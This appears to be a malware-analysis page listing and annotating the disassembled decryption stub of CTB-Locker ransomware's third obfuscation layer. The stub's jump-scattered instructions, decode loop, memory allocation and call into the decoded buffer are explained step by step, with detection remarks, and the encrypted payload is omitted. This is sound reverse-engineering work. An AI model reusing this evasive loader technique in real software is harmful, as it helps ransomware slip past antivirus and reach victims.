CTB-Locker Third Payload obfuscation layer code

Below is the CTB-Locker third payload obfuscation layer code, with the ciphered data omitted and represented by [...]. The deciphering code is broken into chunks of "one instruction, then a jump to the next" and scattered through the encrypted code that will be deciphered.

This is probably intended to get around antivirus and, incidentally, to slow down the reversing process.

You can return to the "CTB-Locker Payload obfuscation layers in-depth analysis" to see this code in the correct order, with comments.

; ----------------------------------------------------------------------------
; Annotated listing: 32-bit x86, Intel-style disassembly, addresses as printed.
; Chunks are shown in address order. "step N" on each chunk is its position in
; the execution path, obtained by following the jmp chain from the entry point
; at 00401FA3. "[...]" stands for the ciphered bytes between chunks.
;
; Traced path:
;   steps  1-6   frame setup (EBP, 20h bytes of locals), save EBX/EDI/ESI
;   steps  7-9   call/pop reads the current address (0048B9DBh); subtracting
;                8A9DBh gives 00401000h at this load address, kept in [EBP-8]
;   steps 10-16  call [EBX+4] with stack args (0, 21A000h, 1000h, 4); the
;                result is stored in [EBP-4]
;   steps 17-20  ESI = [EBP-8] + 0B0h (source), EDX = C78E5EC3h (key state),
;                EDI = [EBP-4] (destination)
;   steps 21-39  decode loop: control byte = source byte XOR DL;
;                0 ends the loop, >= 0E0h skips (byte - 0E0h) source bytes,
;                anything else is the length of a run copied as
;                source byte XOR DL. The key state is updated after every
;                byte read (except the terminating one):
;                EDX = rol(EDX, 3) * -24F331C1h
;   steps 40-47  call [EBX+8] with ([EBP-4], 21A000h, 20h, &[EBP-20h])
;   steps 48-53  push three values and call (final EDI - 5), an address
;                inside the freshly written buffer
;   steps 54-58  restore EBX/ESI/EDI, leave, retn
;
; NOTE(review): the two indirect calls go through pointers at base+4 and base+8
; that are not part of this listing. Their argument patterns are consistent
; with VirtualAlloc(NULL, 21A000h, MEM_COMMIT, PAGE_READWRITE) and
; VirtualProtect(buf, 21A000h, PAGE_EXECUTE_READ, &old) -- confirm against the
; full analysis.
; For detection: splitting the stub into single instructions joined by jmp
; leaves no long contiguous byte sequence for the stub itself, while the
; behaviour (call/pop address read, large region made executable after being
; written, indirect call into that region) is unchanged by the layout.
; ----------------------------------------------------------------------------
; step 35 (copy loop): second half of the key update, EDX = EDX * -24F331C1h
004013C2     imul EDX, EDX, -24F331C1h
004013C8     jmp  00482BDBh
[...]
; step 1: entry point, first instruction of the frame prologue
00401FA3     push EBP                                  ; <===== Entry point
00401FA4     jmp  near ptr 440E0Ch
[...]
; step 50: last value pushed before the call at 00406EC7: [EBP-8], the base
; value stored at step 9
00402EDD     push DWORD PTR SS:[EBP-8]
00402EE0     jmp  00494D18h
[...]
; step 55: restore ESI (saved at step 6)
00403232     mov  ESI, DWORD PTR SS:[EBP-14h]
00403235     jmp  00481B41h
[...]
; step 53: indirect call to EAX = (EDI after the decode loop) - 5, i.e. five
; bytes before the end of the data the loop wrote
00406EC7     call EAX
00406EC9     jmp  00456763h
[...]
; step 37 (copy loop): one byte of the current run done; sets ZF for step 38
00409BF9     dec  ECX
00409BFA     jmp  0043D334h
[...]
; step 49: second value pushed before the call at 00406EC7: [EBP-4], the
; buffer returned by call [EBX+4]
0040AEDA     push DWORD PTR SS:[EBP-4]
0040AEDD     jmp  00402EDDh
[...]
; step 4: save the caller's EBX in [EBP-0Ch]
0040BE41     mov  DWORD PTR SS:[EBP-0Ch], EBX
0040BE44     jmp  004577F8h
[...]
; step 21: decode loop top. EAX is cleared so that, once AL holds the control
; byte, the full register can be used as a length (steps 29 and 31)
0040EBFC     xor  EAX, EAX
0040EBFE     jmp  0046FB58h
[...]
; step 30 (skip branch): back to the loop top
; (this chunk is printed out of address order in the listing)
0040DFA4     jmp  0040EBFCh
[...]
; same chunk as step 21 above, printed a second time in the listing
0040EBFC     xor  EAX, EAX
0040EBFE     jmp  0046FB58h
[...]
; step 44: third argument of call [EBX+8]: 20h
00410F28     push 20h
00410F2A     jmp  004977D6h
[...]
; step 42: EAX = address of the local at [EBP-20h]; pushed at step 43 and also
; used as the base for [EAX+1Ch] at step 46
00412FC8     lea  EAX, [EBP-20h]
00412FCB     jmp  0046314Fh
[...]
; step 52: EAX = (EDI after the decode loop) - 5, the target of step 53
00422961     add  EAX, -5
00422964     jmp  00406EC7h
[...]
; step 27: compare the decoded control byte with 0E0h; sets CF for step 28
0042C1A4     cmp  AL, 0E0h
0042C1A6     jmp  00452BFDh
[...]
; step 8: EAX = 0048B9DBh - 8A9DBh = 00401000h at this load address
0042E492     sub  EAX,8A9DBh
0042E497     jmp  004418F3h                            
[...]
; step 17: ESI = base value from [EBP-8]
0042FD07     mov  ESI, DWORD PTR SS:[EBP-8]
0042FD0A     jmp  00440918h
[...]
; step 12: third argument of call [EBX+4]: 1000h
0043CDB5     push 1000h
0043CDBA     jmp  004490B2h
[...]
; step 38 (copy loop): ECX != 0 -> next byte of the run (00466599);
; otherwise fall through to step 39
0043D334     jne  00466599h
0043D33A     jmp  00492239h
[...]
; step 24: ZF comes from "xor AL, DL" at step 23. A decoded control byte of 0
; ends the decode loop (00476589); otherwise continue with the key update
0043F5EF     je   00476589h
0043F5F5     jmp  004533E5h
[...]
; step 57: tear down the frame built in steps 1-3
0044033D     leave
0044033E     jmp  004743E1h
[...]
; step 18: source pointer = base + 0B0h
00440918     add  ESI,0B0h
0044091E     jmp  00442CA3h
[...]
; step 2: frame prologue, EBP = ESP
00440E0C     mov  EBP, ESP
00440E0E     jmp  00456CF9h
[...]
; step 9: keep the base value in [EBP-8]
004418F3     mov  DWORD PTR SS:[EBP-8], EAX
004418F6     jmp  00467F6Bh
[...]
; step 11: EBX = base value; both indirect calls read their target relative
; to it ([EBX+4] and [EBX+8])
004429DE     mov  ebx, DWORD PTR SS:[EBP-8]
004429E1     jmp  0043CDB5h
[...]
; step 19: initial key state; only DL (its low byte) is XORed with the data
00442CA3     mov  EDX, C78E5EC3h
00442CA8     jmp  00461B73h
[...]
; step 13: second argument of call [EBX+4]: 21A000h
004490B2     push 21A000h
004490B7     jmp  0046AD3Bh
[...]
; step 31 (copy branch): ECX = run length taken from the control byte
; (1..0DFh here, since 0 and >= 0E0h were handled earlier)
0044B84F     mov  ECX, EAX
0044B851     jmp  00466599h
[...]
; step 41: after the loop, save the destination pointer (one past the last
; byte written) in [EBP-18h]; it is read back at step 51
0044CD98     mov  DWORD PTR SS:[EBP-18h], EDI
0044CD9B     jmp  00412FC8h
[...]
; step 28: control byte >= 0E0h -> skip branch (00457B58);
; below 0E0h -> copy branch (0044B84F)
00452BFD     jae  00457B58h
00452C03     jmp  0044B84Fh
[...]
; step 25: first half of the key update after the control byte, EDX = rol(EDX, 3)
004533E5     rol  edx, 3
004533E8     jmp  00488A90h
[...]
; step 3: reserve 20h bytes of locals
; NOTE(review): the jmp below is printed with the same address as the sub;
; "sub ESP,20h" is 3 bytes long, so it presumably sits at 00456CFCh
00456CF9     sub  ESP,20h
00456CF9     jmp  0040BE41h
[...]
; step 54: restore EBX (saved at step 4)
00456763     mov  EBX, DWORD PTR SS:[EBP-0Ch]
00456766     jmp  00403232h
[...]
; step 5: save the caller's EDI
; NOTE(review): printed as [EBP-10] without the h suffix; the matching restore
; at 00481B41 reads [EBP-10h], so this is presumably 10h
004577F8     mov  DWORD PTR SS:[EBP-10], EDI
004577FB     jmp  004A0949h
[...]
; step 29 (skip branch): ESI += control byte - 0E0h (EAX upper bits are zero
; from step 21), advancing the source pointer without writing anything
00457B58     lea  ESI, [EAX+ESI-0E0h]
00457B5F     jmp  0040DFA4h
[...]
; step 20: EDI = destination = buffer returned by call [EBX+4]; the decode
; loop starts at the jmp target
00461B73     mov  EDI, DWORD PTR SS:[EBP-4]
00461B76     jmp  0040EBFCh
[...]
; step 43: fourth argument of call [EBX+8]: address of the local at [EBP-20h]
0046314F     push EAX
00463150     jmp  00410F28h
[...]
; step 34 (copy loop): first half of the key update, EDX = rol(EDX, 3)
00464022     rol  EDX, 3
00464025     jmp  004013C2h
[...]
; step 32 (copy loop): read the next ciphered byte of the run into AL
00466599     lods BYTE PTR DS:[ESI]
0046659A     jmp  00497C5Dh
[...]
; step 10: fourth argument of call [EBX+4]: 4
00467F6B     push 4
00467F6D     jmp  004429DEh
[...]
; step 14: first argument of call [EBX+4]: 0
0046AD3B     push 0
0046AD3D     jmp  0047404Bh
[...]
; step 22: read the ciphered control byte into AL
0046FB58     lods BYTE PTR DS:[ESI]
0046FB59     jmp  0048A723h
[...]
; step 15: indirect call through the pointer at base+4 with
; (0, 21A000h, 1000h, 4) on the stack
; NOTE(review): consistent with VirtualAlloc -- confirm, target not shown here
0047404B     call DWORD PTR DS:[EBX+4]
0047404E     jmp  004887A7h
[...]
; step 58: return to the caller of the entry point
004743E1     retn
[...]
; step 40: decode loop finished; save the final source pointer in [EBP-1Ch]
; (pushed again at step 48)
00476589     mov  DWORD PTR SS:[EBP-1Ch], ESI
0047658C     jmp  0044CD98h
[...]
; step 56: restore EDI (saved at step 5)
00481B41     mov  EDI, DWORD PTR SS:[EBP-10h]
00481B44     jmp  0044033Dh
[...]
; step 36 (copy loop): write the deciphered byte to the destination buffer
00482BDB     stos BYTE PTR ES:[EDI]
00482BDC     jmp  00409BF9h
[...]
; step 48: first value pushed before the call at 00406EC7: [EBP-1Ch], the
; source pointer where decoding stopped
004833F3     push DWORD PTR SS:[EBP-1Ch]
004833F6     jmp  0040AEDAh
[...]
; step 16: keep the value returned by call [EBX+4] in [EBP-4]
004887A7     mov  DWORD PTR SS:[EBP-4], EAX
004887AA     jmp  0042FD07h
[...]
; step 26: second half of the key update after the control byte
00488A90     imul EDX, EDX, -24F331C1h
00488A96     jmp  0042C1A4h
[...]
; step 23: decipher the control byte with the low key byte; sets ZF for step 24
0048A723     xor  AL, DL
0048A725     jmp  0043F5EFh
[...]
; step 47: indirect call through the pointer at base+8 with
; ([EBP-4], 21A000h, 20h, &[EBP-20h]) on the stack
; NOTE(review): consistent with VirtualProtect -- confirm, target not shown here
0048B6F7     call DWORD PTR DS:[EBX+8]
0048B6FA     jmp  004833F3h
[...]
; step 7: call to the next instruction followed by pop: EAX receives the
; return address 0048B9DBh, i.e. the code's own location at run time
0048B9D6     call 0048B9DBh
0048B9DB     pop  EAX
0048B9DC     jmp  0042E492h
[...]
; step 46: first argument of call [EBX+8]: EAX = EBP-20h (step 42), so
; [EAX+1Ch] is [EBP-4], the buffer address
0048CD0A     push DWORD PTR DS:[EAX+1Ch]
0048CD0D     jmp  0048B6F7h
[...]
; step 39 (copy loop): run complete, back to the loop top
00492239     jmp  0040EBFCh
[...]
; step 51: EAX = destination pointer saved at step 41
00494D18     mov  EAX, DWORD PTR SS:[EBP-18h]
00494D1B     jmp  00422961h
[...]
; step 45: second argument of call [EBX+8]: 21A000h, the same size passed to
; call [EBX+4]
004977D6     push 21A000h
004977DB     jmp  0048CD0Ah
[...]
; step 33 (copy loop): decipher the data byte with the low key byte
00497C5D     xor  AL, DL
00497C5F     jmp  00464022h
[...]
; step 6: save the caller's ESI
; NOTE(review): printed as [EBP-14] without the h suffix; the matching restore
; at 00403232 reads [EBP-14h], so this is presumably 14h
004A0949     mov  DWORD PTR SS:[EBP-14], ESI
004A094C     jmp  0048B9D6h
[...]